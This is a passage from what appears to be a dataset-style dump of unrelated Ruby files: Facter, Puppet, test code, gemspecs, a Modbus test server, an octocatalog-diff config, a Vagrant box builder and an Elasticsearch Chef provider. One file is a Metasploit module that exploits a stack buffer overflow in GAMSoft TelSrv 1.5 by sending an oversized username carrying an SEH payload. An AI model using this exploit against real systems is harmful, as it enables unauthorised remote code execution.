facts = []
disks = Facter::Resolvers::Aix::Disks.resolve(:disks)
return Facter::ResolvedFact.new(FACT_NAME, nil) if disks.nil? || disks.empty?
blockdevices = disks.keys.join(',')
facts.push(Facter::ResolvedFact.new(FACT_NAME, disks))
facts.push(Facter::ResolvedFact.new('blockdevices', blockdevices, :legacy))
add_legacy_facts(disks, facts)
facts
end
private
def add_legacy_facts(disks, facts)
disks.each do |disk_name, disk_info|
facts.push(Facter::ResolvedFact.new("blockdevice_#{disk_name}_size", disk_info[:size_bytes], :legacy))
end
end
end
end
end
| 26.272727 | 112 | 0.645905 |
bb55f5945b4bcf8b86175348003dea90e38a6063 | 1,046 | module Puppet::Module::Tool
class Dependency
# Instantiates a new module dependency with a +full_module_name+ (e.g.
# "myuser-mymodule"), and optional +version_requirement+ (e.g. "0.0.1") and
# optional repository (a URL string).
def initialize(full_module_name, version_requirement = nil, repository = nil)
@full_module_name = full_module_name
# TODO: add error checking, the next line raises ArgumentError when +full_module_name+ is invalid
@username, @name = Puppet::Module::Tool.username_and_modname_from(full_module_name)
@version_requirement = version_requirement
@repository = repository ? Repository.new(repository) : nil
end
# Return PSON representation of this data.
def to_pson(*args)
result = { :name => @full_module_name }
result[:version_requirement] = @version_requirement if @version_requirement && ! @version_requirement.nil?
result[:repository] = @repository.to_s if @repository && ! @repository.nil?
result.to_pson(*args)
end
end
end
| 41.84 | 112 | 0.712237 |
d530cb59b97f8e5f4c011da090960d7303501929 | 597 | require File.expand_path("#{File.dirname(__FILE__)}/../../../test_helper")
class Piston::Git::TestGitWorkingCopyRememberance < Piston::TestCase
def setup
super
@wcdir = mkpath("tmp/wc")
@wc = Piston::Git::WorkingCopy.new(@wcdir)
end
def test_creates_dot_piston_dot_yml_file
@wc.remember({}, "a" => "b")
assert((@wcdir + ".piston.yml").exist?)
end
def test_writes_values_as_yaml_under_handler_key
expected = {"a" => "b"}
@wc.remember({}, expected)
actual = YAML.load((@wcdir + ".piston.yml").read)
assert_equal expected, actual["handler"]
end
end
| 27.136364 | 74 | 0.664992 |
acc638d8015439f5e295917a74b8a810924699d8 | 3,423 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'GAMSoft TelSrv 1.5 Username Buffer Overflow',
'Description' => %q{
This module exploits a username sprintf stack buffer overflow in GAMSoft TelSrv 1.5.
Other versions may also be affected. The service terminates after exploitation,
so you only get one chance!
},
'Author' => [ 'patrick' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2000-0665'],
[ 'BID', '1478'],
[ 'URL', 'http://cdn.simtel.net/pub/simtelnet/win95/inetmisc/telsrv15.zip']
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
[ 'Windows 2000 Pro SP0/4 English REMOTE',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 1886,
}
],
[ 'Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 3318,
}
],
[ 'Windows 2000 Pro SP0/4 English LOCAL (debug - dhcp)',
{
'Ret' => 0x75022ac4, # pop/pop/ret ws2help.dll w2k pro en ALL
'Offset' => 3358,
}
],
=begin
[ 'Windows XP Pro SP0/1 English',
{
'Ret' => 0x71aa32ad, # pop/pop/ret xp pro en ALL
'Offset' => 2600, # this is made up and absolutely wrong ;-)
}
],
=end
],
'DisclosureDate' => 'Jul 17 2000',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(23),
], self.class)
end
def check
connect
print_status("Attempting to determine if target is possibly vulnerable...")
select(nil,nil,nil,7)
banner = sock.get_once || ''
vprint_status("Banner: #{banner}")
if banner.to_s =~ /TelSrv 1\.5/
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def exploit
print_status("Trying target #{target.name} on host #{datastore['RHOST']}:#{datastore['RPORT']}...")
connect
print_status("Connected to telnet service... waiting several seconds.") # User friendly message due to sleep.
select(nil,nil,nil,7) # If unregistered version, you must wait for >5 seconds. Seven is safe. Six is not.
username = rand_text_english(20000, payload_badchars)
seh = generate_seh_payload(target.ret)
username[target['Offset'], seh.length] = seh
print_status("Sending #{ username.length} byte username as exploit (including #{seh.length} byte payload)...")
sock.put(username)
select(nil,nil,nil,0.25)
print_status('Exploit sent...')
handler
disconnect
end
end
| 30.026316 | 114 | 0.553608 |
39fba1b0a3c9586d2c30e788bf5c5c02940b1241 | 1,267 | require_relative 'lib/qbittorrent/version'
Gem::Specification.new do |spec|
spec.name = 'qbittorrent'
spec.version = QBittorrent::VERSION
spec.authors = ['Roy Zheng']
spec.email = ['[email protected]']
spec.summary = 'QBittorrent WEB API Client.'
spec.description = 'QBittorrent WEB API Client.only support qBittorrent v4.1+.'
spec.homepage = 'https://github.com/royzheng/qbittorrent'
spec.license = 'MIT'
spec.required_ruby_version = Gem::Requirement.new('>= 2.3.0')
spec.metadata['homepage_uri'] = spec.homepage
spec.metadata['source_code_uri'] = 'https://github.com/royzheng/qbittorrent'
spec.metadata['changelog_uri'] = 'https://github.com/royzheng/qbittorrent'
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path(__dir__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.add_dependency 'http', '~> 4.4.1'
spec.add_dependency 'logger', '~> 1.4'
end
| 40.870968 | 87 | 0.667719 |
034809962d4708c3ad10c595ace3587cef6bc086 | 1,774 | #!/usr/bin/ruby
require "awesome_print"
require "optparse"
require "pp"
require "socket"
ap "This is ruby program about modbus"
options = {}
option_parse = OptionParser.new do |opts|
# 帮助信息
opts.banner = 'here is help messages of the command line tool.'
# Option 作为switch,不带argument,用于将switch设置成true或false
options[:switch] = false;
# 下面第一项是short option,第二项是long option,第三项是对Option的描述
opts.on('-s', '--switch', 'Set options as switch') do
options[:switch] = true;
end
# Option 作为flag, 带argument,用于将argument作为数值解析,比如"name"信息
opts.on('-n NAME', '--name Name', 'Pass-in single name') do |value|
options[:name] = value
end
# Option 作为flag,带一组用逗号分割的arguments,用于将arguments作为数组解析
opts.on('-a A,B', '--array A,B', Array, 'List of arguments') do |value|
options[:array] = value
end
# jiyuhang custom
# listen port
opts.on('-p Port', '--port Port', 'listen port') do |value|
options[:port] = value
end
end.parse!
#ap options
#pp options
localport = 5555
if options.has_key?(:port)
localport = options[:port]
end
puts "listen port #{localport}"
server = TCPServer.open(localport)
loop {
Thread.start(server.accept) do |client|
loop {
head = [0x15,0x01,0x00,0x00,0x00,0x06,0x01,0x03,0x00,0x00,0x00,0x40]
#re = head.pack("CCCCCCCCCCCC")
re = head.pack("C*")
puts "send>"
ap re
ap re.class
ap re.length
client.write(re)
receive = client.read()
puts "receive>"
ap receive
ap re.class
ap receive.length
ap receive.unpack("H*")
ap receive.unpack("h*")
#ap result.length
sleep(20)
}
end
}
| 22.74359 | 80 | 0.600902 |
6a31fe8b9eb528b6a41cfda1e104ff0d504580ac | 1,338 | # frozen_string_literal: true
$LOAD_PATH.push File.expand_path("../lib", __FILE__)
require "simplecov/version"
Gem::Specification.new do |gem|
gem.name = "simplecov"
gem.version = SimpleCov::VERSION
gem.platform = Gem::Platform::RUBY
gem.authors = ["Christoph Olszowka"]
gem.email = ["christoph at olszowka de"]
gem.homepage = "http://github.com/colszowka/simplecov"
gem.description = %(Code coverage for Ruby with a powerful configuration library and automatic merging of coverage across test suites)
gem.summary = gem.description
gem.license = "MIT"
gem.required_ruby_version = ">= 2.4.0"
gem.add_dependency "simplecov-html", "~> 0.10.0"
gem.add_dependency "docile", "~> 1.1"
gem.add_development_dependency "bundler"
gem.add_development_dependency "rake", "~> 12.0"
gem.add_development_dependency "rspec", "~> 3.2"
gem.add_development_dependency "test-unit"
gem.add_development_dependency "cucumber"
gem.add_development_dependency "aruba", "~> 0.14"
gem.add_development_dependency "capybara", "< 3"
gem.add_development_dependency "phantomjs"
gem.add_development_dependency "poltergeist"
gem.add_development_dependency "rubocop", "0.49.1"
gem.files = Dir["{lib}/**/*.*", "bin/*", "LICENSE", "*.md", "doc/*"]
gem.require_paths = ["lib"]
end
| 37.166667 | 136 | 0.700299 |
ed54970b3e5a5b6aeee3f9362f631c0ecf1d6032 | 13,720 | # This is a configuration file for octocatalog-diff (https://github.com/github/octocatalog-diff).
#
# When octocatalog-diff runs, it will look for configuration files in the following locations:
# - As specified by the environment variable OCTOCATALOG_DIFF_CONFIG_FILE
# - Your current working directory: `$PWD/.octocatalog-diff.cfg.rb`
# - Your home directory: `$HOME/.octocatalog-diff.cfg.rb`
# - The Puppet configuration directory: `/opt/puppetlabs/octocatalog-diff/octocatalog-diff.cfg.rb`
# - The local system directory: `/usr/local/etc/octocatalog-diff.cfg.rb`
# - The system directory: `/etc/octocatalog-diff.cfg.rb`
#
# It will use the first configuration file it finds in the above locations. If it does not find any
# configuration files, a default configuration will be used.
#
# To test this configuration file, place it in one of the above locations and run:
# octocatalog-diff --config-test
module OctocatalogDiff
# Configuration class. See comments for each method to define the most common parameters.
class Config
################################################################################################
# Configure your settings in this method!
# This method (self.config) must exist, and must return a hash.
################################################################################################
def self.config
settings = {}
##############################################################################################
# hiera_config
# Path to the hiera.yaml configuration file. If the path starts with a `/`, then it is
# treated as an absolute path on this system. Otherwise, the path will be treated as
# a relative path. If you don't specify this, the tool will assume you aren't using Hiera.
# More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-hiera.md
##############################################################################################
# settings[:hiera_config] = '/etc/puppetlabs/puppet/hiera.yaml' # Absolute path
settings[:hiera_config] = 'hiera.yaml' # Relative path, assumes hiera.yaml at top of repo
##############################################################################################
# hiera_path
# hiera_path_strip
# These control the setup of the 'datadir' when you are using the JSON or YAML data source.
# There are two ways to configure this setting - do one or the other but not both.
#
# 1. (EASIEST METHOD)
# You can specify the path to the hieradata relative to the checkout of your Puppet repo.
# This may be the most straightforward to configure. For example, if your Hiera data YAML
# and JSON files are found under a `hieradata` directory in the top level of your Puppet
# repo, simply set `settings[:hiera_path] = 'hieradata'` and you're done!
#
# 2. (MORE COMPLEX METHOD)
# You can specify a string that will be stripped off the existing defined data directory
# in the hiera.yaml file. For example, perhaps your hiera.yaml file contains this code:
# :yaml:
# :datadir: /etc/puppetlabs/code/environments/%{environment}/hieradata
# In this case, you desire to strip `/etc/puppetlabs/code` from the beginning of the path,
# in order that octocatalog-diff can find your hiera datafiles in the compilation
# location, which is {temporary directory}/environments/production/hieradata.
# If you use this, be sure that you do NOT include a trailing slash!
#
# More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-hiera.md
##############################################################################################
# This should work out-of-the-box with a default Puppet Enterprise or Puppet Control Repo setup.
settings[:hiera_path] = 'hieradata'
# If you want to use the 'strip' method described above, this may work.
# settings[:hiera_path_strip] = '/etc/puppetlabs/code'
##############################################################################################
# puppetdb_url
# URL, including protocol and port number, to your PuppetDB instance. This is used for
# octocatalog-diff to connect and retrieve facts (and possibly compiled catalogs).
# Example: https://puppetdb.yourcompany.com:8081
# More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-puppetdb.md
##############################################################################################
# settings[:puppetdb_url] = 'https://puppetdb.yourcompany.com:8081'
##############################################################################################
# puppetdb_ssl_ca
# CA certificate (public cert) that signed the PuppetDB certificate. Provide this if you
# want octocatalog-diff to verify the PuppetDB certificate when it connects. You should be
# doing this. You can specify an absolute path starting with `/`, or a relative path.
# If you don't specify this, SSL will still work, but the tool won't verify the certificate
# of the puppetdb server it's connecting to.
# More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-puppetdb.md
##############################################################################################
# settings[:puppetdb_ssl_ca] = '/etc/puppetlabs/puppet/ssl/certs/ca.pem'
##############################################################################################
# puppetdb_ssl_client_key
# puppetdb_ssl_client_password
# puppetdb_ssl_client_cert
# puppetdb_ssl_client_pem
#
# This sets up SSL authentication for PuppetDB.
#
# For SSL authentication, the key and certificate used for SSL client authentication.
# Don't set these if your PuppetDB is unauthenticated. The provided example may work if you
# run octocatalog-diff on a machine managed by Puppet, and your PuppetDB authenticates
# clients with that same CA. Otherwise, fill in the actual path to the key and the
# certificate in the relevant settings. If the key is password protected, set
# :puppetdb_ssl_client_password to the text of the password.
#
# You can configure this in one of two ways:
# 1. Set `puppetdb_ssl_client_key` and `puppetdb_ssl_client_cert` individually.
# 2. Set `puppetdb_ssl_client_pem` to the concatenation of the key and the certificate.
#
# VERY IMPORTANT: settings[:puppetdb_ssl_client_key], settings[:puppetdb_ssl_client_cert], and
# settings[:puppetdb_ssl_client_pem] need to be set to the TEXT OF THE CERTIFICATE/KEY, not
# just the file name of the certificate. You'll probably need to use something like this:
# settings[:puppetdb_ssl_client_WHATEVER] = File.read("...")
#
# More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-puppetdb.md
##############################################################################################
# require 'socket'
# fqdn = Socket.gethostbyname(Socket.gethostname).first
# settings[:puppetdb_ssl_client_key] = File.read("/etc/puppetlabs/puppet/ssl/private_keys/#{fqdn}.pem")
# settings[:puppetdb_ssl_client_cert] = File.read("/etc/puppetlabs/puppet/ssl/certs/#{fqdn}.pem")
# For keys generated by Puppet, passwords are not needed so the next setting can be left commented.
# If you generated your own key outside of Puppet and it has a password, specify it here.
# settings[:puppetdb_ssl_client_password] = 'your-password-here'
##############################################################################################
# enc
# Path to the external node classifier. If the path starts with a `/`, then it is
# treated as an absolute path on this system. Otherwise, the path will be treated as
# a relative path. If you don't specify this, the tool will assume you aren't using an ENC.
# More: https://github.com/github/octocatalog-diff/blob/master/doc/configuration-enc.md
##############################################################################################
# settings[:enc] = '/etc/puppetlabs/puppet/enc.sh' # Absolute path
# settings[:enc] = 'environments/production/config/enc.sh' # Relative path
##############################################################################################
# storeconfigs
# If you are using exported/collected resources from PuppetDB, you must enable the
# `storeconfigs` option. If you are not using exported/collected resources, then you
# need not enable this option. If you aren't sure if you're using storeconfigs or not,
# then type this on your Puppet master to find out:
# puppet config --section master print storeconfigs
##############################################################################################
settings[:storeconfigs] = false
##############################################################################################
# bootstrap_script
# When you check out your Puppet repository, do you need to run a script to prepare that
# repository for use? For example, maybe you need to run librarian-puppet to install
# modules. octocatalog-diff allows you to specify a script that will be run within the
# checked-out branch. If the path starts with a `/`, then it is treated as an absolute
# path on this system. Otherwise, the path will be treated as a relative path. If you don't
# specify this, the tool will assume you don't need a bootstrap script.
##############################################################################################
# settings[:bootstrap_script] = '/etc/puppetlabs/repo-bootstrap.sh' # Absolute path
# settings[:bootstrap_script] = 'script/bootstrap' # Relative path
##############################################################################################
# pass_env_vars
# When a catalog is compiled, the compilation occurs in a clean environment. If you have
# environment variables that need to be passed through, e.g. with authentication tokens,
# specify them here. The return value must be an array.
##############################################################################################
# settings[:pass_env_vars] = %w(AUTH_USERNAME AUTH_TOKEN)
##############################################################################################
# puppet_binary
# This is the full path to the puppet binary on your system. If you don't specify this,
# the tool will just run 'puppet' and hope to find it in your path.
##############################################################################################
# These are some common defaults. We recommend removing this and setting explicitly below.
puppet_may_be_in = %w(
bin/puppet
/opt/puppetlabs/puppet/bin/puppet
/usr/bin/puppet
/usr/local/bin/puppet
)
puppet_may_be_in.each do |path|
next unless File.executable?(path)
settings[:puppet_binary] = path
break
end
# settings[:puppet_binary] = '/usr/bin/puppet'
# settings[:puppet_binary] = '/opt/puppetlabs/puppet/bin/puppet'
##############################################################################################
# from_env
# When working with branches, this is the default "from" environment to use. This should
# be set to the branch that is considered "stable" in your workflow. If you are using the
# GitHub flow, this is probably 'origin/master'.
##############################################################################################
settings[:from_env] = 'origin/master'
##############################################################################################
# Less commonly changed settings
##############################################################################################
# Header: options are :default, or can optionally be set to a custom string you provide.
# The default header is like: 'diff NODE_NAME/branch-old NODE_NAME/branch-new'.
settings[:header] = :default
# Cache the master branch and catalogs in home directory. This will speed up the second
# and subsequent octocatalog-diff runs against the same node on the same branch. It's safe
# to leave this enabled, but if you know that you never want to do caching on your system,
# comment these lines out so the tool doesn't spend the time maintaining the cache.
settings[:cached_master_dir] = File.join(ENV['HOME'], '.octocatalog-diff-cache')
settings[:safe_to_delete_cached_master_dir] = settings[:cached_master_dir]
# This is the base directory of your Puppet checkout. Generally you are `cd` into the
# directory when you run octocatalog-diff so this default will just work. However you
# can hard-code this or get it from the environment if you need to.
settings[:basedir] = Dir.pwd
# settings[:basedir] = ENV['WORKSPACE'] # May work with Jenkins
# This method must return the 'settings' hash.
settings
end
end
end
| 59.912664 | 109 | 0.561152 |
03727c021a030af70267317a684f5c93aba0caa4 | 317 | #!/usr/bin/env ruby -wKU
class AVLTree
def initialize
@contents = []
end
def empty?
@contents.empty?
end
def include?(obj)
@contents.include?(obj)
end
def <<(obj)
@contents << obj
end
def height
Math::log(@contents.length).ceil
end
def remove(obj)
@contents.delete(obj)
end
end
| 10.566667 | 35 | 0.637224 |
9138e6a1e98ca7ad8536a4a19bbf9003549fd811 | 340 | require 'spec_helper'
describe "wrap request parameters", type: :request do
describe "json format" do
it 'should not add a root node to the controller parameters' do
get "/users/sign_up", nil, { "CONTENT_TYPE" => "application/json; charset=utf-8" }
expect(request.params).not_to include(:registration)
end
end
end
| 28.333333 | 88 | 0.702941 |
26f2cca2dbf98a1e641ff63b4e8f2373be43d791 | 3,235 | #--
# Ruby Whois
#
# An intelligent pure Ruby WHOIS client and parser.
#
# Copyright (c) 2009-2018 Simone Carletti <[email protected]>
#++
require_relative 'base'
require 'whois/scanners/base_shared2'
module Whois
class Parsers
# Shared parser 2.
#
# @abstract
class BaseShared2 < Base
include Scanners::Scannable
self.scanner = Scanners::BaseShared2
# Actually the :disclaimer is supported,
# but extracting it with the current scanner
# would require too much effort.
# property_supported :disclaimer
property_supported :domain do
node("Domain Name", &:downcase)
end
property_supported :domain_id do
node("Domain ID")
end
property_supported :status do
node("Domain Status") { |value| Array.wrap(value) }
end
property_supported :available? do
!!node("status:available")
end
property_supported :registered? do
!available?
end
property_supported :created_on do
node("Domain Registration Date") { |value| parse_time(value) }
end
property_supported :updated_on do
node("Domain Last Updated Date") { |value| parse_time(value) }
end
property_supported :expires_on do
node("Domain Expiration Date") { |value| parse_time(value) }
end
property_supported :registrar do
node("Registrar") do |str|
Parser::Registrar.new(
:id => node("Registrar IANA ID"),
:name => node("Registrar")
)
end
end
property_supported :registrant_contacts do
build_contact("Registrant", Parser::Contact::TYPE_REGISTRANT)
end
property_supported :admin_contacts do
build_contact("Administrative Contact", Parser::Contact::TYPE_ADMINISTRATIVE)
end
property_supported :technical_contacts do
build_contact("Technical Contact", Parser::Contact::TYPE_TECHNICAL)
end
property_supported :nameservers do
Array.wrap(node("Name Server")).map do |name|
Parser::Nameserver.new(:name => name.downcase)
end
end
private
def build_contact(element, type)
node("#{element} ID") do |str|
address = (1..3).
map { |i| node("#{element} Address#{i}") }.
delete_if(&:nil?).
join("\n")
Parser::Contact.new(
:type => type,
:id => node("#{element} ID"),
:name => node("#{element} Name"),
:organization => node("#{element} Organization"),
:address => address,
:city => node("#{element} City"),
:zip => node("#{element} Postal Code"),
:state => node("#{element} State/Province"),
:country => node("#{element} Country"),
:country_code => node("#{element} Country Code"),
:phone => node("#{element} Phone Number"),
:fax => node("#{element} Facsimile Number"),
:email => node("#{element} Email")
)
end
end
end
end
end
| 25.273438 | 85 | 0.559815 |
e86ce906b1da103eee4499071f527a60c6da7a7b | 39 | module Rainbow
VERSION = "0.1.0"
end
| 9.75 | 19 | 0.666667 |
03be3649a8a608093f72ce2a95923975d4f1e9b4 | 970 | #
# Author:: Matt Eldridge (<[email protected]>)
# © Copyright IBM Corporation 2014.
#
# LICENSE: Apache 2.0 (http://www.apache.org/licenses/)
#
require 'chef/knife/softlayer_base'
class Chef
class Knife
class SoftlayerVlanCreate < Knife
include Knife::SoftlayerBase
banner 'knife softlayer vlan create'
def run
$stdout.sync = true
opts = {
:name => ui.ask_question("Enter a vlan name: "),
:datacenter => connection(:network).datacenters.by_name(ui.ask_question("Enter a datacenter name: ")),
:router => {'hostname' => ui.ask_question("Enter a router hostname: ")},
:network_space => ui.ask_question("Enter a network space: ", :default => 'PUBLIC'),
}
vlan = connection(:network).networks.create(opts)
!!vlan and puts "#{ui.color("VLAN successfully created. Provisioning may take a few minutes to complete.", :green)}"
end
end
end
end
| 25.526316 | 125 | 0.634021 |
e2f7529842a10b9a7a2e062ba2e1acf6f7455f42 | 1,151 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v4/enums/frequency_cap_time_unit.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v4/enums/frequency_cap_time_unit.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum" do
end
add_enum "google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum.FrequencyCapTimeUnit" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :DAY, 2
value :WEEK, 3
value :MONTH, 4
end
end
end
module Google
module Ads
module GoogleAds
module V4
module Enums
FrequencyCapTimeUnitEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum").msgclass
FrequencyCapTimeUnitEnum::FrequencyCapTimeUnit = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v4.enums.FrequencyCapTimeUnitEnum.FrequencyCapTimeUnit").enummodule
end
end
end
end
end
| 34.878788 | 205 | 0.748914 |
b978b5fef539193d1ec82942f7456b0d560f3ad4 | 6,961 | #!/usr/bin/env ruby
require 'json'
require 'optparse'
BIN_DIR = "#{File.dirname(__FILE__)}/bin"
DMG_DIR = "#{File.dirname(__FILE__)}/dmg"
BOX_DIR = "#{File.dirname(__FILE__)}/box"
def log_info(msg)
STDERR.puts "\033[0;32m-- #{msg}\033[0m"
end
def log_error(msg)
STDERR.puts "\033[0;31m-- #{msg}\033[0m"
end
def bail(msg)
log_error msg
exit 1
end
def run_command(cmd)
system(cmd) || bail("Non-zero exit code: #{cmd}")
end
def box_added?(name)
system(%Q( vagrant box list | cut -d" " -f1 | grep -q "^#{name}$" ))
$?.exitstatus == 0
end
def image_specified?
$options[:image_path]
end
def image_exists?
$options[:image_path] && File.exists?($options[:image_path])
end
def base_box_exists?
$options[:base_box_path] && File.exists?($options[:base_box_path])
end
def base_box_added?
$options[:base_box_name] && box_added?($options[:base_box_name])
end
def flavor_specified?
$options[:flavor_name]
end
def flavor_box_exists?
$options[:flavor_box_path] && File.exists?($options[:flavor_box_path])
end
def flavor_box_added?
$options[:flavor_box_name] && box_added?($options[:flavor_box_name])
end
def get_latest_supported_installer_path
installer_path = "/Applications/Install macOS Sierra.app"
if File.exist?(installer_path)
begin
install_info_json = IO.popen(["plutil", "-convert", "json", "#{installer_path}/Contents/SharedSupport/InstallInfo.plist", "-o", "-"]).read
install_info = JSON.parse install_info_json
product_version = install_info["System Image Info"]["version"].split(".")
product_version_minor = product_version[2].to_i
return installer_path if product_version_minor < 4
rescue
end
end
installer_paths = ["/Applications/Install OS X El Capitan.app", "/Applications/Install OS X Yosemite.app"]
while installer_path = installer_paths.shift
return installer_path if File.exists?(installer_path)
end
return nil
end
$options = {}
OptionParser.new do |o|
o.on('--installer-path PATH', 'Path to the input installer app.') { |path| $options[:installer_path] = path }
o.on('--image-path PATH', 'Path to the input/output image.') { |path| $options[:image_path] = path }
o.on('--base-box-name NAME', 'Name of the input/output box.') { |name| $options[:base_box_name] = name }
o.on('--base-box-path PATH', 'Path to the input/output box.') { |path| $options[:base_box_path] = path }
o.on('--flavor-name NAME', 'Name of the flavor.') { |name| $options[:flavor_name] = name }
o.on('--flavor-box-name NAME', 'Name of output flavor box.') { |name| $options[:flavor_box_name] = name }
o.on('--flavor-box-path PATH', 'Path to output flavor box.') { |path| $options[:flavor_box_path] = path }
o.on('-h', '--help') { puts o; exit }
o.parse!
end
$actions = {}
loop do
if flavor_specified?
break if flavor_box_added?
$actions[:add_flavor_box] = true
break if flavor_box_exists?
$actions[:create_flavor_box] = true
end
break if base_box_added?
$actions[:add_base_box] = true
break if base_box_exists?
$actions[:create_base_box] = true
break if image_exists?
$actions[:create_image] = true
break if image_specified?
$actions[:get_version] = true
break
end
run_with_root_privileges = "sudo"
run_without_root_privileges = ""
if Process.uid == 0 && ENV["SUDO_USER"]
run_with_root_privileges = ""
run_without_root_privileges = "sudo -u \"#{ENV["SUDO_USER"]}\""
end
if $actions[:get_version] || $actions[:create_image]
unless $options[:installer_path]
$options[:installer_path] = get_latest_supported_installer_path
log_info "Found installer app: #{File.basename $options[:installer_path]}"
end
if !$options[:installer_path] || !File.exists?($options[:installer_path])
bail "Installer app not found."
end
end
if $actions[:create_base_box]
if $options[:image_path]
unless File.exists? $options[:image_path]
bail "Image not found."
end
$options[:base_box_name] ||= File.basename($options[:image_path], ".dmg")
end
end
if $options[:flavor_name]
$options[:flavor_path] = "#{File.dirname(__FILE__)}/flavor/#{$options[:flavor_name]}"
unless File.exists? $options[:flavor_path]
bail "Flavor not found."
end
end
if $actions[:get_version]
log_info "Getting OS version from installer app..."
installer_version = %x( #{run_with_root_privileges} "#{BIN_DIR}/get_installer_version.sh" "#{$options[:installer_path]}" ).chomp
if installer_version.length == 0
bail "Could not read the OS version from the installer app."
end
$options[:image_path] ||= "#{DMG_DIR}/macos#{installer_version}.dmg"
$options[:base_box_name] ||= "macos#{installer_version}"
log_info "Found OS version '#{installer_version}'."
end
if $actions[:create_image] || $actions[:create_base_box]
bail("Image path not specified.") unless image_specified?
end
if $actions[:create_image]
unless image_exists?
log_info "Creating autoinstall image..."
run_command(%Q( #{run_with_root_privileges} "#{BIN_DIR}/create_autoinstall_image.sh" "#{$options[:installer_path]}" "#{$options[:image_path]}" ))
log_info "Created autoinstall image."
end
end
if $actions[:create_base_box] || $actions[:create_flavor_box]
bail("Base box name not specified.") if !$options[:base_box_name]
$options[:base_box_path] ||= "#{BOX_DIR}/#{$options[:base_box_name]}.box"
end
if $actions[:create_base_box]
unless base_box_exists?
log_info "Creating base box..."
run_command(%Q( #{run_without_root_privileges} "#{BIN_DIR}/create_base_box.sh" "#{$options[:image_path]}" "#{$options[:base_box_path]}" "#{$options[:base_box_name]}" ))
log_info "Created base box."
end
end
if $actions[:add_base_box]
unless base_box_added?
log_info "Adding base box..."
run_command(%Q( #{run_without_root_privileges} vagrant box add "#{$options[:base_box_path]}" --name "#{$options[:base_box_name]}" ))
log_info "Added base box."
end
end
def generate_flavor_box_name(name, flavor)
((name.match(/-/) ? name.split('-')[0..-2] : [name] ) + [flavor]).join('-')
end
if $actions[:create_flavor_box]
$options[:flavor_box_name] ||= generate_flavor_box_name($options[:base_box_name], $options[:flavor_name]) if $options[:base_box_name]
bail("Flavor box name not specified.") if !$options[:flavor_box_name]
$options[:flavor_box_path] ||= "#{BOX_DIR}/#{$options[:flavor_box_name]}.box"
unless flavor_box_exists?
log_info "Creating flavor box..."
run_command(%Q( #{run_without_root_privileges} "#{BIN_DIR}/create_flavor_box.sh" "#{$options[:base_box_name]}" "#{$options[:flavor_path]}" "#{$options[:flavor_box_path]}" "#{$options[:flavor_box_name]}" ))
log_info "Created flavor box."
end
end
if $actions[:add_flavor_box]
unless flavor_box_added?
log_info "Adding flavor box..."
run_command(%Q( #{run_without_root_privileges} vagrant box add "#{$options[:flavor_box_path]}" --name "#{$options[:flavor_box_name]}" ))
log_info "Added flavor box."
end
end
| 32.680751 | 209 | 0.702773 |
ab6f6437efb6150d786ee6835950ba29dc05abe4 | 6,643 | # Chef Provider for configuring an elasticsearch instance
class ElasticsearchCookbook::ConfigureProvider < Chef::Provider::LWRPBase
include ElasticsearchCookbook::Helpers
provides :elasticsearch_configure
def whyrun_supported?
true # we only use core Chef resources that also support whyrun
end
action :manage do
# lookup existing ES resources
es_user = find_es_resource(Chef.run_context, :elasticsearch_user, new_resource)
es_svc = find_es_resource(Chef.run_context, :elasticsearch_service, new_resource)
es_install = find_es_resource(Chef.run_context, :elasticsearch_install, new_resource)
default_configuration = new_resource.default_configuration.dup
# if a subdir parameter is missing but dir is set, infer the subdir name
# then go and be sure it's also set in the YML hash if it wasn't given there
if new_resource.path_data && default_configuration['path.data'].nil?
default_configuration['path.data'] = new_resource.path_data
end
if new_resource.path_logs && default_configuration['path.logs'].nil?
default_configuration['path.logs'] = new_resource.path_logs
end
# calculation for memory allocation; 50% or 31g, whatever is smaller
unless new_resource.allocated_memory
half = ((node['memory']['total'].to_i * 0.5).floor / 1024)
malloc_str = (half > 30_500 ? '30500m' : "#{half}m")
new_resource.allocated_memory malloc_str
end
# Create ES directories
#
[new_resource.path_conf, "#{new_resource.path_conf}/scripts"].each do |path|
d = directory path do
owner es_user.username
group es_user.groupname
mode '0750'
recursive true
action :nothing
end
d.run_action(:create)
new_resource.updated_by_last_action(true) if d.updated_by_last_action?
end
# Create data path directories
#
data_paths = new_resource.path_data.is_a?(Array) ? new_resource.path_data : new_resource.path_data.split(',')
data_paths = data_paths << new_resource.path_logs
data_paths.each do |path|
d = directory path.strip do
